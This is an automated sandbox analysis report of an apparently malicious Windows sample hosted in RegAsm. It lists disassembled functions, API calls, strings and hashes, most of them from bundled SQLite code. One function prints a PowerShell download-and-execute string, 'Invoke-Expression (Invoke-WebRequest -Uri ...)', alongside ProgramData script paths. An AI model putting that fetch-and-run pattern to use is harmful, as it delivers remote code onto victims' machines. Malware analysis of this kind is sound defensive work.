lstrcat.KERNEL32(000000FF,00427C98), ref: 00409C34
lstrcat.KERNEL32(000000FF,00000000), ref: 00409C47
lstrcat.KERNEL32(000000FF,00427C9C), ref: 00409C56
lstrcat.KERNEL32(000000FF,00000000), ref: 00409C69
lstrcat.KERNEL32(000000FF,00427CA0), ref: 00409C78
lstrcat.KERNEL32(000000FF,00000000), ref: 00409C8B
lstrcat.KERNEL32(000000FF,00427CA4), ref: 00409C9A
lstrlen.KERNEL32(000000FF), ref: 00409D10
lstrlen.KERNEL32(000000FF), ref: 00409D1F
memset.MSVCRT ref: 00409D78

Part of subcall function 004100F0: StrCmpCA.SHLWAPI(?,00000000,?,00407516,0145F630,?,00000000,?), ref: 004100FA

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$Heap$AllocProcessSystemTimememset
String ID:
API String ID: 248793818-0
Opcode ID: d2ba082e934dbc401f9ff0b008065b78644ac43cafd502a518f2a1b3700cd46d
Instruction ID: e4c0f5946711812f302e6db09ae3c8add09daf9cf66fbe5071595f1d653c5d4b
Opcode Fuzzy Hash: d2ba082e934dbc401f9ff0b008065b78644ac43cafd502a518f2a1b3700cd46d
Instruction Fuzzy Hash: 8D028271800149EBCB14EBE5DC55BEEBB79AF19304F10816EF906B3182DE786A48CB75

Uniqueness

Uniqueness Score: -1.00%

Function 19D6F370 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 196COMMON

Download Yara Rule

Strings

content, xrefs: 19D6F49D
docsize, xrefs: 19D6F52D
id INTEGER PRIMARY KEY, xrefs: 19D6F43E
id INTEGER PRIMARY KEY, sz BLOB, xrefs: 19D6F524, 19D6F52C
, c%d, xrefs: 19D6F469
config, xrefs: 19D6F549
version, xrefs: 19D6F560
k PRIMARY KEY, v, xrefs: 19D6F544
id INTEGER PRIMARY KEY, sz BLOB, origin INTEGER, xrefs: 19D6F51C

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: , c%d$config$content$docsize$id INTEGER PRIMARY KEY$id INTEGER PRIMARY KEY, sz BLOB$id INTEGER PRIMARY KEY, sz BLOB, origin INTEGER$k PRIMARY KEY, v$version
API String ID: 0-3918257174
Opcode ID: 0da743e7f1f19329beac01fcdbede4e9e9511901cf761b3a4091dad53d8bc4d3
Instruction ID: 55bf40deb3f0fa681d43705a0a7681235eec27fc9a4435402527795b0993a306
Opcode Fuzzy Hash: 0da743e7f1f19329beac01fcdbede4e9e9511901cf761b3a4091dad53d8bc4d3
Instruction Fuzzy Hash: 2B5136329003519BC301AF28DC44B5B77A8EF94765F8C4568EC899B6A1D735FD05CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 19DD7C10 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 150COMMON

Download Yara Rule

Strings

%s%c%s, xrefs: 19DD7C7A
winFullPathname2, xrefs: 19DD7D35
winFullPathname1, xrefs: 19DD7CC9

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: %s%c%s$winFullPathname1$winFullPathname2
API String ID: 0-2846052723
Opcode ID: cb2cc203292061899e6b310a8b36bc3497e49177ca4fbaf6ff1191fc0bfd2bf9
Instruction ID: f6e6c8650003dabb7b165f99c682eac504c30b9d1e1282c30f3408b153128434
Opcode Fuzzy Hash: cb2cc203292061899e6b310a8b36bc3497e49177ca4fbaf6ff1191fc0bfd2bf9
Instruction Fuzzy Hash: 3C417AE5B043D12FF3119A74FC86F673BDAAF41224F1E45ADF8CA565C1DB12A442C262

Uniqueness

Uniqueness Score: -1.00%

Function 00417458 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 127stringfileCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,004286EC), ref: 0041746C
StrCmpCA.SHLWAPI(?,004286F0), ref: 00417482
wsprintfA.USER32 ref: 004174A0

Part of subcall function 00413A80: memset.MSVCRT ref: 00413AB3
Part of subcall function 00413A80: memset.MSVCRT ref: 00413AC5
Part of subcall function 00413A80: lstrcat.KERNEL32(?,00000000), ref: 00413AF1
Part of subcall function 00413A80: lstrcat.KERNEL32(?,01461D70), ref: 00413B10
Part of subcall function 00413A80: lstrcat.KERNEL32(?,?), ref: 00413B24
Part of subcall function 00413A80: lstrcat.KERNEL32(?,01461DA0), ref: 00413B38

FindNextFileA.KERNEL32(00000000,?), ref: 004174F8
FindClose.KERNEL32(00000000), ref: 00417507
lstrcat.KERNEL32(?,0145F8A0), ref: 0041752B
lstrcat.KERNEL32(?,01461738), ref: 0041753F
lstrlen.KERNEL32(000000FF), ref: 00417549
lstrlen.KERNEL32(000000FF), ref: 00417557

Strings

pwA, xrefs: 00417579, 004174C2, 004174CA, 00417581
%s\%s, xrefs: 0041749A

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$Findlstrlenmemset$CloseFileNextwsprintf
String ID: %s\%s$pwA
API String ID: 3642149608-466749030
Opcode ID: 6560676b729605428f1cf24423b77838af4d11f8f5b0b4b289dcb68fff6e4995
Instruction ID: 2e90e08b6375851233fbc302e69b98981367c3422ce142ffed233beea235272d
Opcode Fuzzy Hash: 6560676b729605428f1cf24423b77838af4d11f8f5b0b4b289dcb68fff6e4995
Instruction Fuzzy Hash: 7941BFB5900209ABCB14EFA0CC45FEE7779BF49704F40459EF605A3191DB78AB88CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00417456 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 126stringfileCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,004286EC), ref: 0041746C
StrCmpCA.SHLWAPI(?,004286F0), ref: 00417482
wsprintfA.USER32 ref: 004174A0

Part of subcall function 00413A80: memset.MSVCRT ref: 00413AB3
Part of subcall function 00413A80: memset.MSVCRT ref: 00413AC5
Part of subcall function 00413A80: lstrcat.KERNEL32(?,00000000), ref: 00413AF1
Part of subcall function 00413A80: lstrcat.KERNEL32(?,01461D70), ref: 00413B10
Part of subcall function 00413A80: lstrcat.KERNEL32(?,?), ref: 00413B24
Part of subcall function 00413A80: lstrcat.KERNEL32(?,01461DA0), ref: 00413B38

FindNextFileA.KERNEL32(00000000,?), ref: 004174F8
FindClose.KERNEL32(00000000), ref: 00417507
lstrcat.KERNEL32(?,0145F8A0), ref: 0041752B
lstrcat.KERNEL32(?,01461738), ref: 0041753F
lstrlen.KERNEL32(000000FF), ref: 00417549
lstrlen.KERNEL32(000000FF), ref: 00417557

Strings

pwA, xrefs: 00417579, 004174C2, 004174CA, 00417581
%s\%s, xrefs: 0041749A

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$Findlstrlenmemset$CloseFileNextwsprintf
String ID: %s\%s$pwA
API String ID: 3642149608-466749030
Opcode ID: cab40d892b508aeb38e2b70cbecb0b6424e31468c69512105a83fe5c2dda2b1d
Instruction ID: 924de8276c418feef4113d708d31dfcabf1e1a37831f06c86973242481a33fa5
Opcode Fuzzy Hash: cab40d892b508aeb38e2b70cbecb0b6424e31468c69512105a83fe5c2dda2b1d
Instruction Fuzzy Hash: 2941BEB5900209ABCB10EBA0CC45FEE7779AF49704F40459EF605A3191DB78AB88CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004134B0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 330COMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 004114D0: GetSystemTime.KERNEL32(?,014625C8,00428288,?,00000000,00000000,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 00411525

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

ShellExecuteEx.SHELL32(0000003C), ref: 0041388D

Strings

<, xrefs: 00413845
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00413627
*.ps1, xrefs: 0041350B
"" , xrefs: 00413716
.ps1, xrefs: 00413596
" -UseBasicParsing).Content, xrefs: 004135E3
C:\ProgramData\, xrefs: 00413655
Invoke-Expression (Invoke-WebRequest -Uri ", xrefs: 004135BF
C:\ProgramData\, xrefs: 0041352A

Memory Dump Source

Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
String ID: Invoke-Expression (Invoke-WebRequest -Uri "$" -UseBasicParsing).Content$"" $*.ps1$.ps1$<$C:\ProgramData\$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 2215929589-186952963
Opcode ID: 46e10d4c4e7e76fb46ca7988961a51191b454e96b3af44bc7cf6f3febe5ff9b1
Instruction ID: fa8f6e43a0c6782230aca54303917860090d0f7f5421da2d4c287f35756e6bbf
Opcode Fuzzy Hash: 46e10d4c4e7e76fb46ca7988961a51191b454e96b3af44bc7cf6f3febe5ff9b1
Instruction Fuzzy Hash: B2D15E71811249EACB15EBA5D952BDDBBB86F29304F1040AEF50573282DE781B4CCBB9

Uniqueness

Uniqueness Score: -1.00%

Function 19C73D20 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 223COMMON

Download Yara Rule

Strings

PRAGMA , xrefs: 19C73DC5
=%Q, xrefs: 19C73E7F
%Q., xrefs: 19C73E11

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: %Q.$=%Q$PRAGMA
API String ID: 0-2099833060
Opcode ID: 7fe7ad7aa460f704cdeaa9fd86ebc4ee5752e32d7555757a245c605dfc29c691
Instruction ID: 2012255c1a09b419fe92e7a02eab813c0eeaab29a706ea5a879ecabd92c29534
Opcode Fuzzy Hash: 7fe7ad7aa460f704cdeaa9fd86ebc4ee5752e32d7555757a245c605dfc29c691
Instruction Fuzzy Hash: C5711376A043019BD705EF64FC86B5BB7A4BF84354F0C456DFC899B281D736E9048BA2

Uniqueness

Uniqueness Score: -1.00%

Function 19C5B980 Relevance: 16.7, APIs: 11, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5daee564cc167133ce7699ac3f4e60681edc5e2cef18853a4e7448dd51842de
Instruction ID: 0d7aa181cb7d6eaac404e41f11512681bcc6fe532d327dca8c755a7a3d5d4633
Opcode Fuzzy Hash: e5daee564cc167133ce7699ac3f4e60681edc5e2cef18853a4e7448dd51842de
Instruction Fuzzy Hash: 5E814676A043829BF7008F20E84172ABFA1BF91200F5C4579E8D6172D6DBB5E945CFDA

Uniqueness

Uniqueness Score: -1.00%

Function 19CC1940 Relevance: 16.1, APIs: 5, Strings: 4, Instructions: 345COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19CC1B17
block, xrefs: 19CC1A90
misuse, xrefs: 19CC1B21
%s at line %d of [%.10s], xrefs: 19CC1B26

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$block$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-4016964285
Opcode ID: 6af168816f00c43ee5ddfd3f27f7672eeff3887f860726015d1bfa977c4e152e
Instruction ID: f144c7d474df326a23695c43770edf90c3b8269ce405f60cc42f04b8e9875118
Opcode Fuzzy Hash: 6af168816f00c43ee5ddfd3f27f7672eeff3887f860726015d1bfa977c4e152e
Instruction Fuzzy Hash: B6C1F4B2D00251DFDB12DF26E884A5A7BB4FF84355F088569FC899B391E731DA10CB92

Uniqueness

Uniqueness Score: -1.00%

Function 19C6FED0 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 257COMMON

Download Yara Rule

Strings

abort due to ROLLBACK, xrefs: 19C70068
%llu, xrefs: 19C6FF3C
another row available, xrefs: 19C70076, 19C70081
no more rows available, xrefs: 19C7006F
unknown error, xrefs: 19C7003E
%llu, xrefs: 19C6FFF7

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: %llu$%llu$abort due to ROLLBACK$another row available$no more rows available$unknown error
API String ID: 0-1539118790
Opcode ID: f5e942746505fa782a37f31c22d6c39df65f07db4ce74290938c473f281ab3cd
Instruction ID: ada4abcaeabd37eebabdc59fea029f049ac9fff9ed5d63476bdb829a35b8bb93
Opcode Fuzzy Hash: f5e942746505fa782a37f31c22d6c39df65f07db4ce74290938c473f281ab3cd
Instruction Fuzzy Hash: 2F912675A053009BCB09DE28EC8479A77E1FF85325F88452DF8C99B391D736E846CB52

Uniqueness

Uniqueness Score: -1.00%

Function 19D770B0 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 227COMMON

Download Yara Rule

Strings

invalid rootpage, xrefs: 19D7715C, 19D7730E
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19D7720D
misuse, xrefs: 19D77217
orphan index, xrefs: 19D772C2
API called with finalized prepared statement, xrefs: 19D77201
%s at line %d of [%.10s], xrefs: 19D7721C

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid rootpage$misuse$orphan index
API String ID: 0-165706444
Opcode ID: 7f0db2335a9be52a134d6a146c3c0e02dcd34eb124d753c1f9bedc34e7986ac0
Instruction ID: 882981ffc3cd03ba936f7f20ed028f80bb7f18c33744b6cace52d22f873916cb
Opcode Fuzzy Hash: 7f0db2335a9be52a134d6a146c3c0e02dcd34eb124d753c1f9bedc34e7986ac0
Instruction Fuzzy Hash: 2F619C75A013806BEB259A70EC80F5777A9AF4221DF0E4C69FC6586AC2E721F114C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 19C63A50 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 172COMMON

Download Yara Rule

Strings

cannot delete, xrefs: 19C63A82
read-only, xrefs: 19C63A71
bad page number, xrefs: 19C63BE3
cannot insert, xrefs: 19C63BF1, 19C63C52
no such schema, xrefs: 19C63BEA
bad page value, xrefs: 19C63BDC

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd

Similarity

API ID:
String ID: bad page number$bad page value$cannot delete$cannot insert$no such schema$read-only
API String ID: 0-1499782803
Opcode ID: 2223939b74f1d50614bcbb01171658de7ea18b40b913a28af051c022cd407923
Instruction ID: e7f300cc951aa26e35c7cf8d9d190c5db561dc0a20d2beefc782552b1d1757ea
Opcode Fuzzy Hash: 2223939b74f1d50614bcbb01171658de7ea18b40b913a28af051c022cd407923
Instruction Fuzzy Hash: D151D376A042409BD7018B64ECC6B1677E4AFC0354F1D8469FC8A8B3F2E736E955C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 19C79100 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 161COMMON

Download Yara Rule

Strings

API called with NULL prepared statement, xrefs: 19C7910D
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C7913E
misuse, xrefs: 19C79148
API called with finalized prepared statement, xrefs: 19C79122
%s at line %d of [%.10s], xrefs: 19C7914D

Memory Dump Source

Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true

Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
